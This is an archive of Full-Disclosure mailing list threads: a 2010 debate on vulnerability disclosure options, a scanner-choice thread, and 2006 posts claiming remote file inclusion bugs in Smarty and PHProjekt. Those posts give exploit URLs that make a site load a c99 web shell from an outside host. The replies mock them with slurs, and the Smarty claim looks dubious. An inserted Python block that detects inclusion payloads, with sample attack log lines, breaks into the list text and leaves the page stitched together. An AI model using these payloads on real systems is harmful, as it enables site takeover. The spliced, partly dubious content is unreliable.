Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
On Thu, 29 Apr 2010 10:17:22 +0200, Thierry Zoller said:

> >- Releasing at a conference => Probable court time.
> Under what legislation would that potentially be the case ?

Ask Michael Lynn about that sometime. And Sklyarov ended up in jail for a while for saying 'Rot-13'.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
Hello,

You're missing legislative circumstances in your thoughts:

>- Releasing at a conference => Probable court time.

Under what legislation would that potentially be the case?

>- Keeping it to yourself => Working under the assumption that you're the
>only one that has found that same bug is still semi relevant due to
>the incredibly small size of the exploit dev community. However, as
>Dave said, they'll be toasting to their sleeping dead 0days some day.

Under the jurisdiction I personally am under I am responsible if I DON'T disclose vulnerabilities (to the vendor) - this includes potential damages should the vulnerability be used. This is the law over here if you have the PSF statute.

--
http://blog.zoller.lu
Thierry Zoller
Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
Rob,

The reason why different options exist is because people have the freedom of choice, and depending on their way of thinking they do. Some people want to get paid for their findings through ZDI or iDefense, others prefer the credits only by publishing advisories following or not an RFP. I used to launch advisories in the past, now I'm with the 'No More Free Bugs'. Some people prefer to watch the vulnerabilities get fixed, while others prefer to create weaponized exploits to sell to governments' cyber warfare and cybercrime divisions, or to someone else.

As you won't succeed making politicians agree among them in their way of thinking, you'll also fail trying to do the same among us.

Cheers,
sergio

On Apr 29, 2010, at 5:06 AM, Rob Fuller wrote:

> I have an admittedly limited view of the exploit dev world. However,
> from what I've seen devs have very few options: (Please correct me if
> I'm wrong)
>
> "Responsible Disclosure" =>
>
> - Direct Contact => depending on the size of the vendor and their view
> on security, this could result in anything from a simple thanks, a
> reward, to a court hearing.
>
> - Exploit Broker => possibly sell, possibly not, depends on the
> broker. The vuln could die on the table or be stolen due to too much
> information being given during negotiations. This route has the same
> financial risk as direct contact, but a lot less risk of getting sued.
>
> - ZDI (or other vuln clearing house) => "instant" cash, but admittedly
> less than an Exploit Broker could possibly get based on the financial
> risk to ZDI. Close to zero risk of court time (they may come after you
> for selling the exploit). And a lot less financial risk since (IIRC)
> they pay up front. But then the vulns go to also undisclosed parties,
> potentially the highest bidder which is probably not the vendor.
>
> - "other" secretive groups who share vulns for different reasons...
>
> - Just to friends => No cash, no judicial risk, but you do risk them
> stealing/selling your exploit.
>
> "Full Disclosure"
>
> - Posting it to the web for all to see/use => Possible court time,
> but the definite upside is the vendor is forced to react. A very quick
> way to make enemies.
>
> - Releasing at a conference => Probable court time.
>
> "No Disclosure"
>
> - Keeping it to yourself => Working under the assumption that you're the
> only one that has found that same bug is still semi relevant due to
> the incredibly small size of the exploit dev community. However, as
> Dave said, they'll be toasting to their sleeping dead 0days some day.
>
> "No More Free Bugs"
>
> - My stance on this is split, while I think people should get paid for
> their work, I relate this movement to mowing someone's lawn and then
> ringing their doorbell and asking for money. However I'm sure Robert
> Graham's punch in the face metaphor also works.
>
> //
>
> Like I have stated above, I am far and away a newbie to the vuln
> disclosure world and this debate has been going on since before I
> owned my own computer, but with the brilliant minds working at it, why
> doesn't anyone offer up a solid solution to it?
>
> My solution? Create a standard, something that we all abide by. I know
> as hackers we rebel against such things but in the interest of getting
> better security out there (yes, that's what we are here for right?
> right?) we should really work together on this. What sounds right?
>
> I mean, what is the right way to approach someone whose lawn you've
> mowed for the work you have done? Maybe free for open source projects,
> and a price based on exploitability and market share of the affected
> product?
>
> For reference:
>
> Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
> => http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html
>
> Vuln Disclosure is Rude by Robert Graham:
> => http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html
>
> No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino
> Dai Zovi:
> => http://trailofbits.com/2009/03/22/no-more-free-bugs/
>
> Dailydave Post by Dave Aitel:
> => http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html
>
> --
> Rob Fuller | Mubix
> Room362.com | Hak5.org
[Full-disclosure] Vuln Disclosure summarized (TTBOMA)
I have an admittedly limited view of the exploit dev world. However, from what I've seen devs have very few options: (Please correct me if I'm wrong)

"Responsible Disclosure" =>

- Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing.

- Exploit Broker => possibly sell, possibly not, depends on the broker. The vuln could die on the table or be stolen due to too much information being given during negotiations. This route has the same financial risk as direct contact, but a lot less risk of getting sued.

- ZDI (or other vuln clearing house) => "instant" cash, but admittedly less than an Exploit Broker could possibly get based on the financial risk to ZDI. Close to zero risk of court time (they may come after you for selling the exploit). And a lot less financial risk since (IIRC) they pay up front. But then the vulns go to also undisclosed parties, potentially the highest bidder which is probably not the vendor.

- "other" secretive groups who share vulns for different reasons...

- Just to friends => No cash, no judicial risk, but you do risk them stealing/selling your exploit.

"Full Disclosure"

- Posting it to the web for all to see/use => Possible court time, but the definite upside is the vendor is forced to react. A very quick way to make enemies.

- Releasing at a conference => Probable court time.

"No Disclosure"

- Keeping it to yourself => Working under the assumption that you're the only one that has found that same bug is still semi relevant due to the incredibly small size of the exploit dev community. However, as Dave said, they'll be toasting to their sleeping dead 0days some day.

"No More Free Bugs"

- My stance on this is split, while I think people should get paid for their work, I relate this movement to mowing someone's lawn and then ringing their doorbell and asking for money. However I'm sure Robert Graham's punch in the face metaphor also works.

//

Like I have stated above, I am far and away a newbie to the vuln disclosure world and this debate has been going on since before I owned my own computer, but with the brilliant minds working at it, why doesn't anyone offer up a solid solution to it?

My solution? Create a standard, something that we all abide by. I know as hackers we rebel against such things but in the interest of getting better security out there (yes, that's what we are here for right? right?) we should really work together on this. What sounds right?

I mean, what is the right way to approach someone whose lawn you've mowed for the work you have done? Maybe free for open source projects, and a price based on exploitability and market share of the affected product?

For reference:

Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
=> http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html

Vuln Disclosure is Rude by Robert Graham:
=> http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html

No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino Dai Zovi:
=> http://trailofbits.com/2009/03/22/no-more-free-bugs/

Dailydave Post by Dave Aitel:
=> http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html

--
Rob Fuller | Mubix
Room362.com | Hak5.org
Re: [Full-disclosure] Vuln
On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat <[EMAIL PROTECTED]> wrote:

>I didn't know those were mutually exclusive. That's like asking
>your mom if she is a slut or a whore. Aren't they one and the same?
>
>On 10/15/06, upb <[EMAIL PROTECTED]> wrote:
>>
>> are you fucking stupid or just retarded?
>>
>> On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
>> >
>> > Hi, I found a new vuln ...
>> >
>> > the vuln :-
>> >
>> > #
>> > # Author :- Sp1deR_NeT
>> > # E-mail :- [EMAIL PROTECTED]
>> > # Sites :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>> > #
>> >
>> > Script :- Smarty-2.6.9
>> >
>> > Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>> >
>> > Example :-
>> > www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>> >
>> > Vuln Code :-
>> >
>> >     /**
>> >      * wrapper for include() retaining $this
>> >      * @return mixed
>> >      */
>> >     function _include($filename, $once=false, $params=null)
>> >     {
>> >         if ($once) {
>> >             return include_once($filename);
>> >         } else {
>> >             return include($filename);
>> >         }
>> >     }
>> >
>> > -
>> >
>> > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>> >
>> > -
>> >
>> > WwW.Sp1deR-N3T.Com
>> > [EMAIL PROTECTED]

Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.
Re: [Full-disclosure] Vuln ....
Thanks. But don't worry I won't read sh... anyway :)
Nothing interesting could come from that hitman anyway.

Regards
WAC

On 10/16/06, Pink Hat <[EMAIL PROTECTED]> wrote:
> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> > Hey you could start by writing those sites in English :P
>
> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>
> Not perfect but readable... I guess...
Re: [Full-disclosure] Vuln ....
Nah. That's probably WAY too advanced for 'em. I get the feeling this is the AOL sort of person. Honestly, I'm surprised they figured out how to subscribe to this list in the first place...

Ferdinand Klinzer wrote:
> Google search : Intro to HTML
>
> cheers
>
> On 16.10.2006 at 12:42, C. Hamby wrote:
>
>> Yipe!
>>
>> Ya know if you need an "intro to HTML" book I can probably scare
>> one up for ya... :-)
>>
>> Pink Hat wrote:
>>> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>>>> Hey you could start by writing those sites in English :P
>>>
>>> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>>>
>>> Not perfect but readable... I guess...
Re: [Full-disclosure] Vuln ....
Google search : Intro to HTML

cheers

On 16.10.2006 at 12:42, C. Hamby wrote:

> Yipe!
>
> Ya know if you need an "intro to HTML" book I can probably scare
> one up for ya... :-)
>
> Pink Hat wrote:
>> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>>> Hey you could start by writing those sites in English :P
>>
>> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>>
>> Not perfect but readable... I guess...
Re: [Full-disclosure] Vuln ....
Yipe!

Ya know if you need an "intro to HTML" book I can probably scare one up for ya... :-)

Pink Hat wrote:
> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>> Hey you could start by writing those sites in English :P
>
> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>
> Not perfect but readable... I guess...
Re: [Full-disclosure] Vuln ....
On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> Hey you could start by writing those sites in English :P

http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8

Not perfect but readable... I guess...
Re: [Full-disclosure] Vuln ....
Hey you could start by writing those sites in English :P

On 10/13/06, hitham hitham <[EMAIL PROTECTED]> wrote:
> ===
> # Found By Sp1deR_NeT ..
> # E-mail :- [EMAIL PROTECTED]
> # Sites :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
> # We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )
>
> * Script :- PHProjekt 5.1.1
>
> - Code Vuln :-
>
>     $include_path = $path_pre.'lib/lib.inc.php';
>     include_once($include_path);
>
> In File :- editor_big.php
>
> - Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
>
> Example :- www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
>
> -
> [EMAIL PROTECTED]
> Sp1deR_NeT ^__^
> ===
Re: [Full-disclosure] Vuln
On 10/15/06, Pink Hat <[EMAIL PROTECTED]> wrote:
> I didn't know those were mutually exclusive. That's like asking your
> mom if she is a slut or a whore. Aren't they one and the same?

As I said to Pink Hat: "One's freeware, the other is payware."

The more I think about it, the more it's like software licensing:

- some encourage you to share
- some permit you to create derivative works
- some have viral licenses
- some licenses have severable clauses
- there's the whole issue of market penetration
- showing off the patent may cause you to pay for the product

There's more, but I'll leave them for someone else.

CK
--
GDB has a 'break' feature; why doesn't it have 'fix' too?
Re: [Full-disclosure] Vuln
I didn't know those were mutually exclusive. That's like asking your mom if she is a slut or a whore. Aren't they one and the same?

On 10/15/06, upb <[EMAIL PROTECTED]> wrote:
>
> are you fucking stupid or just retarded?
>
> On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
> >
> > Hi, I found a new vuln ...
> >
> > the vuln :-
> >
> > #
> > # Author :- Sp1deR_NeT
> > # E-mail :- [EMAIL PROTECTED]
> > # Sites :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
> > #
> >
> > Script :- Smarty-2.6.9
> >
> > Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
> >
> > Example :-
> > www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
> >
> > Vuln Code :-
> >
> >     /**
> >      * wrapper for include() retaining $this
> >      * @return mixed
> >      */
> >     function _include($filename, $once=false, $params=null)
> >     {
> >         if ($once) {
> >             return include_once($filename);
> >         } else {
> >             return include($filename);
> >         }
> >     }
> >
> > -
> >
> > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
> >
> > -
> >
> > WwW.Sp1deR-N3T.Com
> > [EMAIL PROTECTED]
Re: [Full-disclosure] Vuln
are you fucking stupid or just retarded?

On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
> Hi, I found a new vuln ...
>
> the vuln :-
>
> #
> # Author :- Sp1deR_NeT
> # E-mail :- [EMAIL PROTECTED]
> # Sites :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
> # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
> #
>
> Script :- Smarty-2.6.9
>
> Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>
> Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>
> Vuln Code :-
>
>     /**
>      * wrapper for include() retaining $this
>      * @return mixed
>      */
>     function _include($filename, $once=false, $params=null)
>     {
>         if ($once) {
>             return include_once($filename);
>         } else {
>             return include($filename);
>         }
>     }
>
> -
>
> Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>
> -
>
> WwW.Sp1deR-N3T.Com
> [EMAIL PROTECTED]
[Full-disclosure] Vuln
Hi, I found a new vuln ...

the vuln :-

#
# Author :- Sp1deR_NeT
# E-mail :- [EMAIL PROTECTED]
# Sites :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
#

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Vuln Code :-

    /**
     * wrapper for include() retaining $this
     * @return mixed
     */
    function _include($filename, $once=false, $params=null)
    {
        if ($once) {
            return include_once($filename);
        } else {
            return include($filename);
        }
    }

-

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.

-

WwW.Sp1deR-N3T.Com
[EMAIL PROTECTED]
Re: [Full-disclosure] Vuln ....
Ououh! What a geek! Your website is a crappy shit, I laughed a lot with yours:

img src="../../Desktop/333_files/index_05.jpg"

Take care!

- Original Message -
From: "hitham hitham" <[EMAIL PROTECTED]>
To:
Sent: Friday, October 13, 2006 4:40 PM
Subject: [Full-disclosure] Vuln
[Full-disclosure] Vuln ....
===
# Found By Sp1deR_NeT ..
# E-mail :- [EMAIL PROTECTED]
# Sites :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
# We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )

* Script :- PHProjekt 5.1.1

- Code Vuln :-

    $include_path = $path_pre.'lib/lib.inc.php';
    include_once($include_path);

In File :- editor_big.php

- Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

-
[EMAIL PROTECTED]
Sp1deR_NeT ^__^
===
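Both "Vuln" posts above describe the same shape of bug: a request parameter (`filename` in the Smarty wrapper, `$path_pre` in the PHProjekt include) reaches include()/include_once() with no check on what it points at. The following is an added example, not code from Smarty, PHProjekt or anyone in the thread; it shows the defender's side of that pattern: a detector over web-server access-log lines that flags parameter values shaped like file-inclusion payloads, and the path-confinement check an include that has to accept a user-supplied file name needs. The log lines, IP addresses, the `attacker.example` host and the `ALLOWED_INCLUDES` set are constructed for the example.

```python
"""Added example for the include()-of-a-request-parameter reports above.
Not code from Smarty, PHProjekt or any poster; log lines, IPs and hosts
below are constructed."""
import os
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Minimal parser for the Apache/nginx "combined" log format: only the client
# address, request target and status are extracted; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)               # http://, ftp://, php://, data://
HOST_RE = re.compile(r'^(www\.)?[a-z0-9-]+(\.[a-z0-9-]+)+/', re.I)   # scheme-less host/path as in the posts


def include_param_risk(value: str) -> Optional[str]:
    """Classify one query-parameter value; None means nothing suspicious.

    The value is URL-decoded a second time so a double-encoded payload is
    judged as the path a script that decodes its own input would build.
    """
    v = unquote(value)
    if SCHEME_RE.match(v):
        return "url-or-wrapper"   # include("http://...") / stream wrapper: remote inclusion
    if HOST_RE.match(v):
        return "host-like-path"   # heuristic: bare hostname/path, as in the posted examples
    if "../" in v or "..\\" in v:
        return "traversal"        # local inclusion outside the intended directory
    if "\x00" in v:
        return "null-byte"        # truncates whatever suffix the script appends
    return None


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious query parameter in the given lines."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = include_param_risk(value)
            if reason:
                findings.append({"ip": m.group("ip"), "param": name, "value": value,
                                 "reason": reason, "status": m.group("status")})
    return findings


def resolve_local_include(base_dir: str, requested: str, allowed: frozenset) -> str:
    """Turn a user-supplied file name into a path that is safe to include.

    Only names in `allowed` that resolve to a file directly under `base_dir`
    are returned; anything else raises ValueError. This is the check the
    posted code lacks when it hands $filename / $path_pre straight to include().
    """
    if include_param_risk(requested):
        raise ValueError(f"rejected include target: {requested!r}")
    base = os.path.realpath(base_dir)
    real = os.path.realpath(os.path.join(base, requested))  # absolute input replaces base
    if os.path.dirname(real) != base or os.path.basename(real) not in allowed:
        raise ValueError(f"include outside allowlist: {real}")
    return real


def include_is_allowed(base_dir: str, requested: str, allowed: frozenset) -> bool:
    """Boolean wrapper for callers that only need a verdict."""
    try:
        resolve_local_include(base_dir, requested, allowed)
        return True
    except ValueError:
        return False


# Constructed sample: one benign request, then three inclusion attempts.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Oct/2006:10:01:02 +0000] "GET /index.php?page=home&lang=en HTTP/1.1" 200 1042 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Oct/2006:10:01:09 +0000] "GET /libs/Smarty.class.php?filename=http://attacker.example/c99.txt? HTTP/1.1" 200 512 "-" "curl/7.15"',
    '203.0.113.7 - - [14/Oct/2006:10:01:11 +0000] "GET /lib/specialdays.php?path_pre=../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "curl/7.15"',
    '198.51.100.9 - - [14/Oct/2006:10:02:30 +0000] "GET /index.php?page=www.attacker.example/shell.txt? HTTP/1.0" 200 88 "-" "-"',
]
ALLOWED_INCLUDES = frozenset({"lib.inc.php", "specialdays.php"})  # constructed allowlist


def main() -> None:
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']:<14} {f['reason']:<15} {f['param']}={f['value']!r} (status {f['status']})")
    for name in ("lib.inc.php", "../../etc/passwd", "http://attacker.example/c99.txt?"):
        print(f"{name!r:<40} allowed={include_is_allowed('/srv/app', name, ALLOWED_INCLUDES)}")


if __name__ == "__main__":
    main()
```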
RE: [Full-disclosure] Vuln scanner software choices
Secure Enterprise mag did a review of 7 different "vulnerability-management suites" (as they called them) in Dec. 2004. Take it for what it's worth, but notice that ISS was not included. Perhaps the review offered by Mr. Schmehl is all you need.

http://www.secureenterprisemag.com/products/showArticle.jhtml?articleID=54200188

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl
Sent: Thursday, November 10, 2005 4:58 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vuln scanner software choices

--On Thursday, November 10, 2005 12:32:27 -0700 Tblinux <[EMAIL PROTECTED]> wrote:

> I know that most if not all of you use or have used Nessus at some point.
> I've been following the thread. Now that it appears that Nessus is
> seriously ratcheting down support for independent consultants and
> corporate / gov't users without a registered and paid for license what
> scanning software are you considering? Has anyone done a *complete*
> comparison of all of the scanning software out there and made a choice
> based on the findings? If so what was it?
>

There's bound to be a comparison somewhere. All I can tell you, from personal experience, is avoid ISS like the plague it is.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Vuln scanner software choices
--On Thursday, November 10, 2005 12:32:27 -0700 Tblinux <[EMAIL PROTECTED]> wrote:

> I know that most if not all of you use or have used Nessus at some point.
> I've been following the thread. Now that it appears that Nessus is
> seriously ratcheting down support for independent consultants and
> corporate / gov't users without a registered and paid for license what
> scanning software are you considering? Has anyone done a *complete*
> comparison of all of the scanning software out there and made a choice
> based on the findings? If so what was it?

There's bound to be a comparison somewhere. All I can tell you, from personal experience, is avoid ISS like the plague it is.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
[Full-disclosure] Vuln scanner software choices
I know that most if not all of you use or have used Nessus at some point. I've been following the thread. Now that it appears that Nessus is seriously ratcheting down support for independent consultants and corporate / gov't users without a registered and paid for license, what scanning software are you considering? Has anyone done a *complete* comparison of all of the scanning software out there and made a choice based on the findings? If so, what was it?

I work for a fairly large company and the contract negotiations with Tenable are going poorly and the company I work for is looking at the options. Any input would be greatly appreciated.